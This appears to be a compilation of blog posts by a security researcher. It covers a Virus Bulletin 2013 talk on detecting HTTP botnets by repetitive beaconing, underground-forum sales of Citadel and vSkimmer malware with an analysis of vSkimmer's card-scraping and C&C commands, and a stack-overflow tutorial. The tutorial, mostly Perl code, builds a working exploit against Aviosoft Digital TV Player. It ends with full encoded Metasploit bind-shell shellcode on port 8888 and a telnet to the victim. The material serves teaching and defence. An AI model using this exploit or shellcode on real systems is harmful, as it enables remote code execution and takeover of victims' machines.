Virus Bulletin 2013 @ Berlin , Germany : My First International Security Conference As a Speaker

Virus Bulletin 2013 , one of the top computer security conferences was held this year in Berlin , Germany from 2nd - 4th October 2013 , and I was invited to speak on one of the research that I did on Behavioural method to detect HTTP botnets. Detection method precisely focuses on couple of key areas :

• How do we differentiate traffic generated by automated clients from the human initiated traffic.
• How do we examine and differentiate outbound HTTP traffic generated from the legitimate sources like web browsers , from the malicious botnet Command and Control traffic over HTTP protocol
• Monitoring of the idle host based on the volume of the traffic generated and determining its suspiciousness on the basis of repetitive connections to C&C server.

I also discussed about the algorithmic approach and how do we apply on the network perimeter to detect botnet activity with high degree of accuracy . Entire blog post can be found over here and over here on the McAfee Labs blogs as well . Pretty interesting read and result oriented approach .

This was one of the very few presentations audience really found interesting . Although it was on the final day of the conference and the audience was relatively less then previous two days which was kind of little disappointing . 3rd Oct evening was the fantastic drinks party followed by a gala dinner and sensational German dance performances in the evening ended the day. So lesser audience on the last day of the conference wasn't too surprising to me.

On the other side , several presentations on the technical stream was interesting . One of them that got my attention was a talk from Microsoft guys , revealing the major problem that the AV industry could have started facing today . The presentation was about attacks on the AV Automation systems itself. Today , industry heavily rely on telemetry data and sample sharing between the vendors to be able to quickly respond to the 0 day threats. AV automation systems are primarily builded to auto-classify lakhs of malware samples received everyday and generate automatic signatures . Attackers have now started to probe these automation systems to find the loopholes in automatic signature generation  and exploit them by injecting the specifically crafted clean files into the telemetry system and poisoning them . Imagine the mess that it can cause due to significant volume of such crafted files received via telemetry.

Entire presentation from Microsoft speakers can be viewed here : Working together to defeat attacks against AV automation

One of the other presentations that I found interesting was from F-secure titled "Statistically effective protection against APT attacks " talking about the research that they did on several available exploit mitigation methods and which one is most effective in preventing exploits from executing shellcode . Research talks about how effective are the mitigation methods like Application sandboxing , Client application hardening , Memory handling mechanisms for exploit prevention and Network hardening and which one is most effective against some of the in the wild exploits . Kind of useful research .

Overall , it was a fantastic conference and got the opportunity to socialize and meet lot of people out there sharing ideas and talking about lot of stuff ..

All the slides of VB 2013 presentations are available here . 

Periodic Command Pull From C&C Servers Paves The New Way to Detect Botnets

HTTP has been predominantly used by recent botnets and APTs as their primary channel of communication with the Command and Conrol servers . This number has significantly shown increase in the last few quarters. One of the research shows  that more than 60% of the botnets use HTTP protocol to achieve C&C communication and the number has kept increasing. Below distribution shows the popularity and dominance of HTTP protocol among the top botnet families.

Couple of  apparent reasons to use HTTP as a primary channel for C&C is that it cannnot be blocked on the network since it carries major chunk of the internet traffic today . Secondly , it is not hard , but nearly impossible to differentiate the legitimate HTTP traffic from the malicious one on the network perimeter unless you have the known signatures for it. This makes HTTP even more popular among malware authors.

Industry is well aware of the fact that traditional signature based approaches are no longer a solution to today's sophistication level of the threats and limitations with this has driven the shift of focus from signatures to behaviour. But we need to answer the question : What are those suspicious behaviours we should look for on the network ?

Before we answer that question , I'd like to throw some light on the typical lifecycle of botnet command and control over HTTP.

• Botnets would typically connect to a small number of C&C domains . It may try to resolve too many domains over the short period of time when it does DGA kind of stuff , but once it successfully resolves a domain and connects, it will stay connected to the same domain for its lifetime
• Once connected , it will send either HTTP GET / POST request to the specific resource ( URI ) of the C&C server as the registration / phone home communication.
• It will execute the command received from the C&C server OR will either sleep for the fixed interval of time before connecting back again and pull the command from C&C.
• Subsequently, it will connect to the server at fixed / stealth intervals and will keep pulling commands or might send keepalive messages to announce its existance periodically.

What we learn out of this behaviour is that botnets typically work in a “pull” fashion; they continuously fetch commands from the control server, either at fixed intervals or at stealth level . Quick example to demonstrate this behaviour is Zeus . Below is traffic snapshot of Zeus communicating with control server every 6 seconds.

Zeus C&C communication over the network

We realize that machine infected with botnet communicating with the control server periodically is the automated traffic . Since this behaviour can also be exhibited from the legitimated software and websites, another questions comes up here : How do we differentiate browser / human initiated traffic from the automated traffic ?  Certain facts that we can definitely rely on : 

• It is abnormal for most users to connect to a specific server resource repeatedly and at periodic intervals. There might be dynamic web pages that periodically refresh content, but these legitimate behaviors can be detected by looking the server responses.
• The first connection to any web server will always have response greater than 1KB because these are web pages. A response size of just 100 or 200 bytes is hard to imagine under usual conditions.
• Legitimate web pages will always have embedded images, JavaScript, tags, links to several other domains, links to several file paths on the same domain, etc. These marks the characteristics of the normal web pages.
• Browsers will send the full HTTP headers in the request unless it is intercepted by MiTM tools that can modify / delete headers.

All of the above facts allows us to think about the specific behaviour we can look on the network : Repetitive connections to the same server resource over HTTP protocol

Assume that we choose to monitor a machine under idle conditions–when the user is not logged on the machine–we can distinguish botnet activity with a high level of accuracy. We think about monitoring the idle host because that's the period where the traffic volume is less. It is kind of relatively easy to identify idle host due to the nature of the traffic that it generates ( usually version updates , version checks , keepalives etc ..). We 'd never expect the idle host to generate traffic to yahoo.com or hotmail.com.

Under these conditions , if the machine is infected with Spyeye botnet , traffic will look like this:

Notice that Zeus ( in the previous screenshot ) / Sypeye connects to one control domain and keeps sending HTTP POST every 6 and 31 seconds respectively to a specific server resource. Algorithmically, while idle, we’d deem a host's activity suspicious when :

1. The number of unique domains a system connects to is less than a certain threshold
2. The number of unique URIs a system connects to is less than a certain threshold
3. For each unique domain, the number of times a URI is repetitively connected to is greater than a certain threshold

Assuming the volume of traffic from the host is less, If we take the preceding conditions in a window of say two hours, we might come up with following:

1. Number of unique domains = 1 (less than the threshold)
2. Number of unique URIs connected = 1 (less than the threshold)
3. For each unique domain, the number of times a unique URI is repetitively connected to = 13 (greater than threshold)

 The approach however, does not mandates that repetitive activity should be seen at these fixed intervals. If we choose to monitor within a larger window, we could detect more stealthy activities. The following flowchart represents a possible sequence of operations.

The first few checks are important to determine whether the host isn't talking too much. First, Total URI > threshold determines that we have enough traffic to look into. Next, Total Domain access >/= Y determines that the number of domains accessed is not too large. The final check is to see if Total unique URIs < Z. The source ends up on the suspicious list if we believe it has generated repetitive connections.

For instance, if the Total URIs = 30, Total Domain access = 3, and Total Unique URI accessed = 5, we guarantee a repetitive URI access from the host. Now if the number of repetitive accesses to any particular URI crosses the threshold (for example, 1 URI accessed 15 times within a window), we can further examine the connection and apply some of heuristics to increase our confidence level and eliminate false positives. Some heuristics we can apply:

• Minimal HTTP headers sent in the request
• Absence of UA/referrer headers
• Small server responses and  lacking structure of usual web page
• Domain registration time and perhaps reputation as well.

Let’s look at an example of SpyEye sending minimal HTTP headers without a referrer header:

I implemented the proof of concept for this approach and I could detect the repetitive activity with relative ease.

Applying this method over several top botnet families exhibiting similar behaviour , I could detect them with medium to high level of confidence.

Behavioral detection methods will be the key to detecting next-generation threats. Given the complexity and sophistication of the recent advanced attacks, such detection approaches can address threats proactively–without waiting for signature updates–and will prove to be much faster.

Citadel Botnet Logs With Bank Account Logins On a Sale In Underground Forums

Financial theft is one of the most lucrative forms of cybercrime. Malware authors continue to deliver sophisticated tools and techniques to unlock online bank accounts. Attackers design and develop botnets to perform financial fraud, targeting banks and other institutions for profit. These botnets traditionally have monitored victims’ Internet activities and intercepted banking transactions to extract account credentials and send them to their control servers. Recent botnets are armed with more advanced capabilities, yet traditional methods continue to be the most effective way to steal money.

Recently I came across an underground Russian forum in which an author was actively selling botnet logs with account-login details from one targeted bank.

These botnet logs were from the Citadel botnet Version 1.3.4.5 (Extreme Edition). Citadel is a variant of the popular Zeus botnet and has been widely seen since late 2012. The latest edition of this botnet has already been covered in several blogs out there.

Here is a snapshot of server code for extracting bank account information stored in the database of the C&C server.

Here is what this mysterious banking botnet can do.It can log all the credentials used to login into the bank account , from the Citadel infected machine and sends it to the C&C server.

Research has revealed that Citadel is one of the most active botnets in the world, spanning several locations across Europe. One of the major reasons for its common use is that the botnet setup services are fairly cheap via the underground community. Here is an advertisement for the Citadel setup service.

Same user advertising his setup service on another forum.

Yet another service offered for the same botnet.

Many cybercriminals avoid transferring money to their own accounts due to the risk of prosecution, but selling the account information and making the money from the sale is an effective way of preserving  anonymity. Thus the attacker can’t be held accountable for the transfers made from a stolen account.
As the precautionary measure, we should look out for accounts being accessed or transactions made to/from different geographical locations. Banks place limits on the amount of money that can be transferred in one day or in a single transaction. Spotting small, unauthorized transactions made from an account should be noticeable and prevent major financial losses.

VSkimmer Botnet Targets Point-Of-Sale Devices : Be Cautious When You Swipe Your Credit Cards Next Time For Shopping !!..

I was monitoring one of the Russian underground forums a while back, and came across a discussion thread  where the author was offering the malware for sale which had the capability to steal the credit card information from the Windows machines attached the Credit / Debit card payment devices.This malware, vSkimmer, can detect the card readers, grab all the information from the Windows machines attached to these readers, and send that data to a control server. These kind of equipments are typically known as Point-Of-Sale devices used for processing the Credit / Debit card financial transactions and are used in shops , hotels and other industries . The author of the thread also discusses other capabilities of this malware, which appears to be a successor of Dexter discovered last year , but with additional functions.

Later in the thread , author of this malware discusses about the payment methods and the sale policies.

We already know about botnets such as Zeus , SpyEye , Citadel  ( variant of Zeus ) which performs financial fraud using extremely sophisticated techniques including  intercepting the victims’ banking transactions. VSkimmer is another example of how financial fraud is actively evolving and how financial Trojans are developed and passed around in the underground community. This botnet is particularly interesting because it directly targets card-payment terminals running Windows.

I analyzed  samples of this malware and figured out how it steals the credit card information and its additional control functionalities as well. While performing the API tracing , we found it uses fairly standard antidebugging techniques .

The malware collects the following information from the infected machine and sends it to the control server:

• Machine GUID from the Registry :
• Locale info
• Username
• Hostname
• OS version

This malware uses a standard installation mechanism and copies itself as svchost.exe into %APPDATA% , modifies the registry key to add itself under the authorized list of apps, and runs ShellExecute to launch the process. One function of vSkimmer if the Internet is not available is to wait for a USB device with the volume name KARTOXA007  to be connected to the infected machine and to copy all the logs with the file name dumz.log and the card info collected from the victim to the USB drive.

As you can notice in the above code , it tries to resolve the C&C server www.posterminalworld.la and if it does not resolve , it will call another subroutine to wait for the USB drive to be connected and copies the collected logs.

I checked by disconnecting from the Internet. The malware enumerated all the drives and created the file dumz.log in the drive with the preceding name.

Extracting Credit Card numbers from the memory

VSkimmer maintains the whitelisted process, which it skips while enumerating the running processes on the infected machine.

Once vSkimmer finds any running process not in the whitelist, it executes  OpenProcess and ReadProcessMemory to read the memory pages of the process and invokes the pattern-matching algorithm to match the regular expression “?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??”)” and extract the card info read by the payment devices. This is done recursively for every process running in the infected machine and not on the whitelist and continues doing it as long as the malware runs inside the system.

Vskimmer Network Communications

Before communicating with the command and control server, the malware B64-encodes all the machine information collected and appends it to the URI. The encoded string follows this format:

machine guid|build_id|bot_version|Windows_version|Host_name|User_Name

While this malware ran, we saw the following response. Note that the commands are within the tag.

Once vSkimmer receives a response from the server, it executes the following routine to parse the command:

Because the response from the server during execution was null, the malware extracts the 3-byte command and tries to match it with the other commands implemented by vSkimmer. First it checks if the command from the server is “dlx.”

If not, then vSkimmer checks for the “upd” command. These commands implement the HTTP download and execute (“dlx”) and update of the bot (“upd”), respectively.

As we saw earlier in this post, vSkimmer can also grab the Track 2 data stored on the magnetic strip of the credit cards. This track stores all the card information including the card number. (You can read more about the Track 2 data format on Wikipedia. In summary , the data stored is : 

• Primary Account Number : The number printed on the front of the card
• Expiration Date
• Service Code: the three-digit number

Vskimmer botnet Control Panel

Stack Overflows - Part 2 : Executing The Shellcode

In the part 1 , we talked about lot of basics of stack overflow and some of the theoritical concepts that will help us get into it little deeper . We stopped at the point where we had exception thrown from the debugger . In this part , we will see how to translate this vulnerability into a working exploit and make the vulnerable software execute our own code.

As an example , we will use the stack overflow vulnerability discovered in Aviosoft Digital TV Player Professional 1.x reported here . You can get the copy of vulnerable application and PoC exploit over here. This software has the stack based buffer overflow vulnerability when opening the specially crafted and malicious .plf file which can lead to the arbitrary code execution on the machine running this software if it opens the specially crafted .plf file .

The primary reason I selected this is that it is a very simple exploit which serves as a perfect example for the beginners to understand the process of building the working exploits. We will walk through the process step by step and build the exploit from the scratch .

System setup

To be able to reproduce and trigger this vulnerability , I would recommend using Windows XP SP2 as the victim system . This is precisely because of the fact that this version of the Windows XP does not have some of the stack overflow protection mechanisms that is introduced in SP3 and later . In case if you still wish to use SP3 as your victim system , you must turn off Data Execution Prevention ( DEP ) . Windows XP SP3 has the DEP turned on by default for all the services . If you turn this off , you are good to go ahead ..

Next , I am using Backtrack 5 as my attacking system . I 'll be using perl / python environment to write the exploits and Metasploit to build the shellcode. Both of these are virtual machines bridged to be able to talk to each other . You need not to have the exact similar setup and it should be pretty Ok to use whatever you have as long as you are able to translate this demo to your systems . Along with the vulnerable software installed in the victim system , We also need any one of your favourite debuggers to be installed . It could be either Immunity / Windbg / Ollydbg . I would suggest you install alteast Immunity and ollydbg debuggers in your VM. Immunity debugger has a very powerful plugin interface scriptable in python and several python scripts available already to make our exploit developement lot more easier.

Triggering the vulnerability

First step towards building a working exploit is to verify the vulnerability and make sure that the application is throwing an exception / crashing when it is supplied malicious or specially crafted .plf file. You should be able to find the information about the vulnerable copy of the software from the relevant page on exploit db. I wrote the following simple perl script , which will write the content into the .PLF file

This simple perl script will create the .PLF file with 500 bytes of data. I wrote 500 "A"s ( Hex : 0x41) into the .PLF file .  Next , we open the software in the debugger ,run it and feed this file into the Aviosoft Digital TV player :

And we see the application has crashed throwing the exception and debugger is in control of the program as it catches the exception .

If we take a look the crash in Windbg , it will look like this :

At this point , application throwed the "Access violation" exception which is being caught and reported by the debugger because application couldn't read the memory at location 0x41414141 . It read our .PLF file into the buffer and because it did not check on the number of bytes that it read on the stack , it overwrote the application's stack with the junk data ( several 0x41s in this case ) which has ultimately gone and overwrote the Instruction pointer ( EIP register ) . If you observe the stack pointer , ESP has 0x0012F274 which also points at an offset in our supplied buffer of junk data.

Another point worth noticing over here is that before trying the file with 500 bytes of data , I also tried with 100 and 200 bytes of data but the application did not crash . This effectively means that the application will die if we supply the file which contains somewhere between 200 to 500 bytes of data. This information will eventually help us to figure out the exact offset in our buffer at which the Instruction pointer is overwritten.

We need to be aware that not every application crash is exploitable though . It may be just a denial of service , but in lot of cases it is . Our goal here is to utilize this crash and make the application do something which it is not intended to. We will look to redirect the execution flow of the application to execute the code that we want . To achieve this , primarily information that we need to have is : The exact offset at which the Instruction pointer is overwritten . This is the basic requirement for controlling the execution flow of the program . If we are able to figure this out , we can overwrite the EIP , exactly at that offset , with the usable memory address that contains the instruction which can help us Jump to our code.

In the previous tutorial , we knew the exact size of our buffer and we could easily guess the offset at which the EIP should be overwritten but in this case , we have no information on the size of buffer . Also , the overflowed stack has all "A"s at the moment. It is not going to be easy to figure out the offset ,  until we break the buffer down to multiple pieces to get the better idea .

Determining the buffer size and exact offset to overwrite the Instruction pointer

We will modify the perl script to break the buffer into smaller portion and each portion will contain the different set of bytes and then we'll append them to create larger one :

#!/usr/bin/perl
my $file= "Aviosoft_exploit.plf";
my $buffer_1="A" x 250;
my $buffer_2="B" x 150;
my $buffer = $buffer_1 . $buffer_2;
open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with" . length($buffer) . "bytes of data\n";

close($FILE);

We attach the software to the debugger again and load the .PLF file created with above exploit.

This time , we supplied 400 bytes of data with two different sets of byte patterns and the application still crashed with EIP  overwritten with 0x42424242. Now we are sure that buffer size is somewhere between 250 and 400 bytes . i.e the offset to overwrite the EIP should be between 250 to 400 bytes . We still narrow down the gap with little modification to the script as below :

#!/usr/bin/perl
my $file= "Aviosoft_exploit.plf";
my $buffer_1="A" x 250;
my $buffer_2="B" x 50;
my $buffer = $buffer_1 . $buffer_2;
open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with" . length($buffer) . "bytes of data\n";

close($FILE);

And the result is the crash with EIP : 0x42424242 . We now have much better visibility . Our offset should be within 250 to 300 bytes . Will little more similar experiments , I eventually  figured out that the offset at which the EIP is written is 260 bytes within our buffer. Crash in Windbg will look like this :

ESP contains 0x0012F274 as we noticed before and if we dump the contents of the stack we will see the ESP pointing to the portion of our supplied buffer of Bs ( Hex 0x42 ) :

This was little time consuming since we had to make several guesses to come out with the correct offset . We have another better and a direct way to do this .We can determine the correct offset right at the first shot using the Metasploit  " pattern_create.rb" and " pattern_offset.rb" tools .. pattern_create.rb is supplied with buffer size as an argument and it will generate the unique pattern of strings . We can use that string in our exploit and we'll be able to figure out the exact offset right at the first attempt . On Backtrack 5 , you need to go to the /opt/metasploit/msf3/tools directory and run the pattern_create.rb with the size of the string to output :

We can use this generated pattern in our exploit :

#!/usr/bin/perl
my $file= "Aviosoft_exploit.plf";
my $buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"

open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with" .  length($buffer)  . "bytes of data\n";

close($FILE);

We load the application again in the debugger , launch the exploit and this is what we'll see again.

Instruction pointer now has 0x37694136 . Recall the concept of little endian Vs big endian we discussed in the previous part. The fact is EIP is overwritten with 0x36416937 since the Intel processors stores the data in the memory in little endian format. We now have the unique string with us to search for in the buffer and we can determine the offset with metasploit "pattern_offset.rb " tool . 

By now , we should be able to clearly understand the fact that the exact buffer size we need to overwrite the EIP is 260 . Another thing that we need to figure out is the offset at which the ESP is pointing to our buffer . By doing this , we would exactly know where to place our shellcode on the stack . If we observe the stack in Windbg , that is what we have :

ESP , at this point has 0x0012F274 which is pointing to the part of our buffer . I dumped the stack at this address and the value is 0x6A33416A ..We will again use the metasploit pattern_offset.rb tool to determine the exact offset in our buffer pointed by ESP . Again , remember the fact that the data is stored in the little endian format . so we need to search for 0x6A41336A while using the metasploit tool . I ran patter_offset.rb  and here is the offset I found on my system :

Ah Wow !! ..With all the previous excercise that we did , we now have information about two very critical things :

1 . We know that the buffer size is exactly 260 bytes before EIP is overwritten . This translates to the fact that , at this offset , we can overwrite the return address with something useful. We'll see that in a moment.
2 . Another info we have at this point is :  ESP is pointing at an offset 280 in our buffer. We will use this fact to place our shellcode and finally make the program jump to it to execute that code. We'll see that too in a moment .

Before we go ahead , let's do a final verification on this info . I'll craft the buffer in the following way :

#!/usr/bin/perl
my $file= "Aviosoft_exploit.plf";
my $buffer_1="A" x 260;  
my $buffer_2="B" x 4;       
my $buffer_3="C' x 16;
my $buffer_4="Our Shellcode is here"; 
my $buffer = $buffer_1 . $buffer_2 . $buffer_3 . $buffer_4;
open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with " . length($buffer) . " bytes of data\n";

close($FILE);

We are expecting two things out of this exploit :

1 . EIP should have the value 0x42424242 . we crafted the buffer with 260 bytes of "A" and then 4 bytes of "B" with which EIP should be written.
2 . ESP should point to the string "Our Shellcode is here" on the stack . This is where we will place our shellcode to execute .

I launched the exploit in Windbg and here is what I saw:

Wow !!..This is what we exactly wanted..we got the access violation and EIP has the value 0x42424242 and ESP is pointing to our string as we expected. Now think about this  :  At this location , if we place our shellcode ( i.e the code that we want this application to execute ) and if we overwrite the EIP with the address to the instruction that can jump to our shellcode , we are done !! .

Important point to remember here is that when the application crashes , we need to see if EIP written with the supplied buffer..If it is , we can control EIP with the value that we want . Next , we need to see all the registers and check which one them is pointing to the portion of our buffer . In this case it was ESP but it could be EAX , EBX or other register . Once we have both of these , all we need to do is overwrite the EIP with the address of the instruction that can jump to our shellcode and over !! ..However , stack overflows are not always that easy ..There are few things that we need to take care of above this : Bad characters , Null bytes in shellcode , available limited  buffer space to host our shellcode etc. We'll come to these topics and see how to overcome them ..

How much memory space do you have to host your shellcode ?

This is another question that we need to get the answer for. This will help us figuring out how long our shellcode can be . Assume that the code we want the application to execute ,  becomes too large to fit into the limited buffer size , then we may need to reduce its size so that it can fit itself or we need to look some for other alternatives. Let's try and determine how much buffer space we have in this case . This will exactly help us gain the visibility on how large our shellcode can be . I did slight modification in the script :

#!/usr/bin/perl
my $file= "Aviosoft_exploit.plf";
my $buffer_1="A" x 260;  # buffer space before EIP
my $buffer_2="B" x 4;      # EIP overwritten with this value
my $buffer_3="C' x 16;
my $buffer_4="D" x 600;  # ESP is pointing here
my $buffer = $buffer_1 . $buffer_2 . $buffer_3 . $buffer_4;
open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with " . length($buffer) . " bytes of data\n";

close($FILE);

When I launched the exploit again , I saw the ESP pointing to string of "D" and stack is filled up with it all the way down. This basically confirms that we have over 600 bytes of buffer space to host our shellcode. We are all good.

Finally...Buiding the Exploit.

Since we see ESP currently with the value 0x0012F274 , directly pointing to our supplied buffer , one of the very first thing that we would like to try is overwriting the EIP with the value of the ESP and trying to redirect the code execution..Let's actually craft the exploit and see what happens . I am modifying the script in the following way :

#!/usr/bin/perl

my $file= "Aviosoft_exploit.plf";
my $buffer_1="A" x 260;  # buffer space before EIP
my $buffer_2="\x74\xf2\x12\x00";      # EIP overwritten with this value
my $buffer_3="C' x 16;
my $buffer_4="D" x 600;  # ESP is pointing here
my $buffer = $buffer_1 . $buffer_2 . $buffer_3 . $buffer_4;
open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with " . length($buffer) . " bytes of data\n";

close($FILE);

Remember that the data is stored in the little endian format ..So we need to write the address other way round ( in reverse order ) to be able to save it on the stack in the correct order.

If you observe the debugger output I got after launching this exploit , we managed to overwrite the EIP with the value that we wanted to ( 0x0012F274 in this case ). ESP is also pointing to the same location and you see that it tried to execute the instruction at that location but generated the exception ..If we dump the ESP , I dont see all the "D"s that I expected and we saw a while back . This is because of the fact that our buffer had a Null byte in the address which acted as a string terminator . .PLF file was read into the memory and since this is a string buffer , it got terminated as soon as it encountered the null byte in the address and the buffer wasn't copied any further which makes the exploit useless.

Above this , overwrite EIP with the direct address of the stack has multiple problems :

-- This address is not static . You may see ESP pointing to the different address on the different OS versions.
-- Jumping to direct memory address is a bad idea because of the fact that when you are exploiting remotely, you dont know where the application stack is allocated and where the ESP is pointing to ..

So this solution will not work for us because of the null byte problem and exploit wont be reliable as well . Alternative way we can redirect to our code is to search for the JMP ESP instruction in the process memory or in the memory of the loaded application modules ( DLLs ). If we overwrite the EIP with the address of the JMP ESP instruction , after it executes that instruction , ESP will be placed into EIP and we can execute our own code . Let's search for the JMP ESP instruction using ollydbg . While searching for this , we need to make sure that the address does not contain any Null ( 0x00) bytes.

Once is application is running in the debugger , we see lot of application specific modules loaded in there..When you are searching for the JMP ESP instruction , it is always preferable to use the DLLs that comes with the application rather than system DLLs ..This is because these DLLs are usually not compiled with ASLR and SafeSEH enabled ..In effect , these will make our exploit lot more reliable .

I searched for this instruction in EqualizerProcess.dll which comes with the software , and found the JMP ESP instruction at address 0x02365005..Address could be different in your system. With all this info , I will build the final exploit that will have the shellcode to launch calc.exe . Here is the final script :

#!/usr/bin/perl
my $file= "Aviosoft_exploit.plf";
my $buffer_1="A" x 260;  # Junk data
my $buffer_2="\x05\x50\x36\x02";      # EIP overwritten with the address of JMP ESP
my $buffer_3="\x90" x 16;            #NOP padding 
my $buffer_4="\x31\xc0\x50\x68\x63\x61\x6c\x63\x89\xe3\x50\x53\xbb\x85\x25\x86\x7c\xff\xd3\x50\xbb\xfa\xca\x81\x7c\xff\xd3"; # ESP points here . Shellcode to spawn calc.exe
my $buffer = $buffer_1 . $buffer_2 . $buffer_3 . $buffer_4;
open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with " . length($buffer) . " bytes of data\n";
close($FILE);

When I again launched the exploit :

We've successfully exploited the buffer overflow vulnrerability in Aviosoft Digital TV Player..but what if we want to do something more interesting than just launching calc.exe? Let's use metasploit payload generator and generate the shellcode that can open a port and bind a shell on the victim system..Metasploit payload generator can generate variety of shellcode with different parameters depending on what you'd want to do .On Backtrack 5, go to the /pentest/exploits/framework2/ and fire the following command to look at the list of payloads available for various OS..

#msfpayload -l

We can generate TCP shell bind payload which will bind the shell on port TCP port 8888 on victims' machine . Use following command.

#msfpayload windows/shell_bind_tcp LPORT=8888 P

LPORT is the local port on which it should listen and P is the output in the perl format . Here is the shellcode that you get in the perl format :

Notice that the shellcode size generated here is 341 bytes which is long if we have the limited buffer space available with us.In this case size of the buffer is not the problem but notice the Null bytes right in the first line of our shellcode ..This is a serious concern. If we place this shellcode in our exploit, it wont work because null byte will act as the string terminator and rest of our buffer will not be copied on the stack . We should avoid atleast \x00 , \x0a, \x0d in our shellcode since these are default bad characters . There could be other bad characters as well which we will have to figure out by comparing our original generated shellcode with the shellcode existing in the memory. For now , to overcome this we will use the raw output and pipe this into the msfencode to remove the bad characters with followng command :

msfpayload windows/shell_bind_tcp LPORT=8888 R | msfencode  -b '\x00\x0a\x0d' -t perl

This will give the output in the Perl format and see that now there are no null bytes but size of the shellcode has increased .

Metasploit generates different output of the shellcode during each successive runs.So you shouldn't be afraid if you see different shellcode on your machine every time. I compared the shellcode in the memory with that in our exploit and I found one more bad character: \x1a. and with that I fired following command again to generate the shellcode free from this character :

msfpayload windows/shell_bind_tcp LPORT=8888 R | msfencode  -b '\x00\x0a\x0d\x1a' -t perl

and ended up with the working shellcode. Here is our final exploit :


#!/usr/bin/perl
my $file= "Aviosoft_exploit.plf";
my $junk="A" x 260;  # Junk data
my $EIP="\x05\x50\x7d\x02";
my $nop="\x90" x 50;   # Make sure you have enough NOPs before the shellcode for the decoder to work correctly while in memory , else the exploit will fail . 

my $shellcode = "\xdb\xd2\xba\x9a\xe7\x37\x15\xd9\x74\x24\xf4\x5b\x33\xc9" .
"\xb1\x56\x31\x53\x18\x83\xeb\xfc\x03\x53\x8e\x05\xc2\xe9" .
"\x46\x40\x2d\x12\x96\x33\xa7\xf7\xa7\x61\xd3\x7c\x95\xb5" .
"\x97\xd1\x15\x3d\xf5\xc1\xae\x33\xd2\xe6\x07\xf9\x04\xc8" .
"\x98\xcf\x88\x86\x5a\x51\x75\xd5\x8e\xb1\x44\x16\xc3\xb0" .
"\x81\x4b\x2b\xe0\x5a\x07\x99\x15\xee\x55\x21\x17\x20\xd2" .
"\x19\x6f\x45\x25\xed\xc5\x44\x76\x5d\x51\x0e\x6e\xd6\x3d" .
"\xaf\x8f\x3b\x5e\x93\xc6\x30\x95\x67\xd9\x90\xe7\x88\xeb" .
"\xdc\xa4\xb6\xc3\xd1\xb5\xff\xe4\x09\xc0\x0b\x17\xb4\xd3" .
"\xcf\x65\x62\x51\xd2\xce\xe1\xc1\x36\xee\x26\x97\xbd\xfc" .
"\x83\xd3\x9a\xe0\x12\x37\x91\x1d\x9f\xb6\x76\x94\xdb\x9c" .
"\x52\xfc\xb8\xbd\xc3\x58\x6f\xc1\x14\x04\xd0\x67\x5e\xa7" .
"\x05\x11\x3d\xa0\xea\x2c\xbe\x30\x64\x26\xcd\x02\x2b\x9c" .
"\x59\x2f\xa4\x3a\x9d\x50\x9f\xfb\x31\xaf\x1f\xfc\x18\x74" .
"\x4b\xac\x32\x5d\xf3\x27\xc3\x62\x26\xe7\x93\xcc\x98\x48" .
"\x44\xad\x48\x21\x8e\x22\xb7\x51\xb1\xe8\xce\x55\x7f\xc8" .
"\x83\x31\x82\xee\x01\x7a\x0b\x08\x2f\x6a\x5a\x82\xc7\x48" .
"\xb9\x1b\x70\xb2\xeb\x37\x29\x24\xa3\x51\xed\x4b\x34\x74" .
"\x5e\xe7\x9c\x1f\x14\xeb\x18\x01\x2b\x26\x09\x48\x14\xa1" .
"\xc3\x24\xd7\x53\xd3\x6c\x8f\xf0\x46\xeb\x4f\x7e\x7b\xa4" .
"\x18\xd7\x4d\xbd\xcc\xc5\xf4\x17\xf2\x17\x60\x5f\xb6\xc3" .
"\x51\x5e\x37\x81\xee\x44\x27\x5f\xee\xc0\x13\x0f\xb9\x9e" .
"\xcd\xe9\x13\x51\xa7\xa3\xc8\x3b\x2f\x35\x23\xfc\x29\x3a" .
"\x6e\x8a\xd5\x8b\xc7\xcb\xea\x24\x80\xdb\x93\x58\x30\x23" .
"\x4e\xd9\x40\x6e\xd2\x48\xc9\x37\x87\xc8\x94\xc7\x72\x0e" .
"\xa1\x4b\x76\xef\x56\x53\xf3\xea\x13\xd3\xe8\x86\x0c\xb6" .
"\x0e\x34\x2c\x93";

my $buffer=$junk . $EIP . $nop . $shellcode;
open($FILE,">$file");
print $FILE  $buffer;
print "PLF File Created successfully with " . length($buffer) . " bytes of data\n";
close($FILE);

Restarted the debugger and launched the exploit again :

And boom !!. Game is over !! ..Here you see the victim machine has opened the TCP port 8888 and is now listening on that port ..

Let's check if we can get the shell on that port as promised by the shellcode. I did a Telnet from another machine to victim on port 8888.

#Telnet 192.168.246.137 8888

This is it..Hope you'd now be able to build your own working exploit ..In the next part , we'll take a look into some of the other aspects of Stack overflows and few debugger plugins which can make your life lot more easier..